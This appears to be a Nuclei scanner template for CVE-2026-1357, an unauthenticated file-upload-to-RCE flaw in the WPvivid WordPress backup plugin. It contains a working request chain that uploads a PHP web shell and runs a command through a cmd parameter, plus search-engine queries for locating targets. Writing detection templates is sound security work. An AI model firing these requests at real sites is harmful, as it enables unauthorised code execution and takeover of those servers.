id: CVE-2026-1357

info:
  name: WPvivid Backup & Migration <= 0.9.123 - Unauthenticated Arbitrary File Upload to RCE
  author: omarkurt,LucasM0ntes
  severity: critical
  description: |
    The WPvivid Backup & Migration plugin for WordPress up to version 0.9.123
    is vulnerable to unauthenticated arbitrary file upload via the
    wpvivid_action=send_to_site endpoint. Improper RSA decryption error handling
    causes a fail-open condition where a null-byte AES key is used, combined with
    path traversal in the filename parameter, allowing upload of arbitrary files
    for Remote Code Execution.
    NOTE: Exploitation requires an active API key to be generated in the plugin
    settings (8-hour default expiration).
  remediation: Upgrade WPvivid Backup & Migration plugin to version 0.9.124 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2026-1357
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/e5af0317-ef46-4744-9752-74ce228b5f37
    - https://github.com/LucasM0ntes/POC-CVE-2026-1357
    - https://vulnerabletarget.com/VT-2026-1357
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-1357
    cwe-id: CWE-434
  metadata:
    verified: true
    max-request: 3
    vendor: wpvivid
    product: wpvivid-backuprestore
    shodan-query: http.component:"WordPress"
    fofa-query: body="wp-content/plugins/wpvivid-backuprestore"
    publicwww-query: "/wp-content/plugins/wpvivid-backuprestore/"
  tags: cve,cve2026,wordpress,wpvivid,file-upload,rce,intrusive

http:
  - raw:
      - |
        GET /wp-content/plugins/wpvivid-backuprestore/readme.txt HTTP/1.1
        Host: {{Hostname}}
      
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        wpvivid_action=send_to_site&wpvivid_content=MDAzQUJDMDAwMDAwMDAwMDAwMDBmMELNPZt4vf0kx9Z5QuHeh%2F5okNwc%2F8qLd3P2Hk0m88yvAxs6d86iQU%2FFyCEkRHxRI%2FpY95UgBalk5PkTurFcTZ4kiRiTEysIofgD1Nh7bzeatkMFb3mqsDi40fdI0TFdFPdiSrCWP80zsXb5GWLAzsCHFqC6HeZJQaNGW76sn417LxZ1koEAE9rIC2i0Pu81e4260k36m1O9jFvRE1h63sZgL259LIOrNWn%2Fn%2BA6ZOOAFJLiswSilXY0CjNhB%2FtUvBpM2KFaveuxEH8N9g3S0JS1i%2BEH9qgkFyai%2F%2BeBBoujP%2BEYYoqIbfEliCObdLgbcg%3D%3D
      
      - |
        GET /wp-content/uploads/pwn_remote.php?cmd=echo+CVE-2026-1357-VULN HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - "WPvivid"
          - "Stable tag:"
        condition: and

      - type: word
        part: body_2
        words:
          - '"result":"success"'

      - type: word
        part: body_3
        words:
          - "CVE-2026-1357-VULN"

      - type: dsl
        dsl:
          - 'compare_versions(version, "<= 0.9.123")'

    extractors:
      - type: regex
        name: version
        part: body_1
        group: 1
        regex:
          - '(?i)Stable\s+tag:\s*(\d+\.\d+\.\d+)'
        internal: true